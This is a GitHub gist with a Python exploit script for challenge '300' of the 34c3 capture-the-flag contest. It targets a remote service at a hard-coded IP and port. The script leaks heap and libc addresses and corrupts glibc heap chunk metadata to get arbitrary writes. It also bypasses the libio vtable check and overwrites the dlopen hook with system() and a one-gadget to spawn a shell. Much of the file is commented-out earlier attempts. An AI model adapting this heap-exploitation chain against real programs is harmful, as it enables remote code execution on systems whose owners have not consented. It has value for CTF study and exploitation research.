Skip to content

Instantly share code, notes, and snippets.

@mak

mak/exp300.py

Created January 3, 2018 17:29
Show Gist options
  • Save mak/6beb7733344881e96eac7ec8c4b6bc70 to your computer and use it in GitHub Desktop.
Save mak/6beb7733344881e96eac7ec8c4b6bc70 to your computer and use it in GitHub Desktop.
Download ZIP
Exploit for 300 at 34c3ctf
Raw
exp300.py
import phun
class R(phun.Remote):
def menu(self):
self.read('4) free\n')
def cmd(self,nr,idx):
self.menu()
self.sendline(str(nr))
self.sendlineafter('(0-9)\n',str(idx))
def read_it(self,idx):
self.cmd(3,idx)
return self.readline()[:-1]
def alloc(self,idx):
self.cmd(1,idx)
def free(self,idx):
self.cmd(4,idx)
def write_it(self,idx,what):
self.cmd(2,idx)
self.write(what.ljust(0x300,"\x00"))
#r= R('192.168.122.234',1234)
r= R('104.199.25.43',1337)
#r= R('localhost',1234)
for i in range(10):
r.alloc(i)
for i in range(1,7,2):
r.free(i)
heap = phun.u64(r.read_it(5)) - 0x930
addr_in_libc = phun.u64(r.read_it(1))
main_arena = addr_in_libc - 88
#off1 = 0x3C4B20
off1 = 0x3C1B00
libc = main_arena - off1 #
addr = heap + 0x30
free_hook = libc + 0x3C67A8 #0x3C3788
print hex(heap),hex(libc)
print hex(main_arena),hex(free_hook)
off1 = 0x3C67F8
#off1 = 0x3C37D0
globalmaxfast= libc + off1 - 16 ##
off1 = 0x3C4150
#off1 = 0x3C1150
check_action = libc + off1 - 16 ##
r.write_it(1,phun.p64(0xdeadbeef,addr))
r.alloc(9)
chunk0 = phun.p64(0,0x3f0,addr+0x20,addr+0x20)
chunk1 = phun.p64(0,0x310,addr+0x40,addr+0x40)
chunk2 = phun.p64(0,0x20,main_arena+88,main_arena+88)
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
r.alloc(9)
r.write_it(1,"\x00"*0x100 + phun.p64(0x3f0))
r.alloc(8)
r.alloc(2)
r.free(7)
r.write_it(7,phun.p64(0xdeadbeef,addr))
r.alloc(3)
#raw_input('e')
chunk0 = phun.p64(0,0x319,addr+0x20,addr)
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
r.alloc(4)
chunk0 = phun.p64(0,0x311,addr,main_arena+96)
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
r.alloc(5)
chunk2 = phun.p64(0,0x20,main_arena+96,main_arena+96)
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
r.alloc(1)
file_all = libc + 0x3c2500 -0x18#0x3C2500 -0x18# - 0x18
chunk0 = phun.p64(0,0x311,file_all,file_all)
r.write_it(1,phun.p64(addr).ljust(0x2f0,"\x00")+\
phun.p64(main_arena+864,main_arena+872))
chunk0 = phun.p64(0,0x310,file_all,file_all)
chunk2 = phun.p64(0,0x310,file_all,main_arena+864)
r.write_it(0,chunk0+chunk1+chunk2)
r.write_it(9,"\x00"*0x10 + chunk2)
r.alloc(3)
#raw_input('x')
chunk0 = phun.p64(0,0x300,addr+0x20,addr+0x20)
chunk1 = phun.p64(0,0x310,addr+0x40,addr+0x40)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(1,phun.p64(addr).ljust(0x2e0,"\x00")+\
# phun.p64(file_all,file_all))
# r.alloc(3)
#bypass vtable check
raw_input('x')
dlopen_hook = libc + 0x3c62e0 - 0x18
print hex(dlopen_hook)
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
r.write_it(1,phun.p64(addr).ljust(0x2e0,"\x00")+\
phun.p64(dlopen_hook,dlopen_hook))
r.alloc(3)
p = phun.p64(libc + 0xF1651).ljust(0x18,"\x00")
#"/bin/bash"
# p += phun.p64(1,2)
# p = p.ljust(0xa0,"\x00")
# p += phun.p64(heap+0x30)
# p = p.ljust(0xc0,"\x00")
# p += phun.p64(1)
# p = p.ljust(0xd8)
# p += phun.p64(heap + 0x10)
system = libc + 0x456A0 #0x45390
jump_table = "\x00"* 0x18 + phun.p64(system)
raw_input('x')
r.write_it(0,jump_table + p)
r.free(7)
'''
arena+856 - my small bin
victim:
-
'''
#r.write_it(7,phun.p64(0xdeadbeef,main_arena+88))
# chunk0 = phun.p64(0,0x311,main_arena+88,main_arena+88)
# chunk2 = phun.p64(0,0x3f0,main_arena+88,main_arena+88)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(1,"\x00"*(0x100-0xf0+0x10) + phun.p64(0x311,0x20,1,1,1,1,1))
# r.alloc(8)
# r.free(8)
# r.write_it(9,phun.p64(0xdeadbeef1,free_hook-0x20))
# r.alloc(4)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(1,"\x00"*(0x100-0xf0+0x10) + phun.p64(0x311,0x21,1,1,1,1,1))
# r.free(8)
# chunk0 = phun.p64(0,0x319,main_arena+88,addr+0x20)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(1,"\x00"*(0x100-0xf0+0x18) + phun.p64(0x319,0x21,1,1,1,1,1))
# r.write_it(9,phun.p64(0xdeadbeef2,check_action))
# r.alloc(4)
# chunk0 = phun.p64(0,0x3f1,main_arena+88,main_arena+88)
# chunk2 = phun.p64(0,0x3f1,main_arena+88,main_arena+88)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(1,"\x00"*(0x100) + phun.p64(0x3f1,0x21,1,1,1,1,1))
# r.free(8)
# chunk0 = phun.p64(0,0x3f1,main_arena+88,addr+0x20)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(9,phun.p64(addr,free_hook-0x20+8))
# r.alloc(4)
# chunk0 = phun.p64(0,0x3f1,main_arena+88,main_arena+88)
# chunk1 = phun.p64(0,0x91,main_arena+88,main_arena+88)
# x= "\x00"*0x20+chunk0+chunk1+chunk2
# x+="\x00"*0x50 + phun.p64(0,0x21,0,0,1,1,1,1,1)
# r.write_it(0,x)
# raw_input('x')
# r.free(9)
# # r.write_it(5,phun.p64(0xdeadbeef,check_action))
# # for i in range(3):
# # r.alloc(1)
# # r.free(1);r.free(3);r.free(7)
# # for i in range(9):
# # r.alloc(i)
# # for i in range(1,7,2):
# # r.free(i)
# # r.write_it(5,phun.p64(0xdeadbeef,globalmaxfast))
# # r.alloc(1);r.alloc(2);r.alloc(3)
# # # r.free(1)
# # # r.free(2)
# # # r.free(3)
# # r.free(5)
# # #r.write_it(5,phun.p64(free_hook,free_hook))
# # r.alloc(0)
# # for i in range(10):
# # r.alloc(i)
# # raw_input('x')
# # #r.alloc(3)
# # # # #r.write_it(
r.shell()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment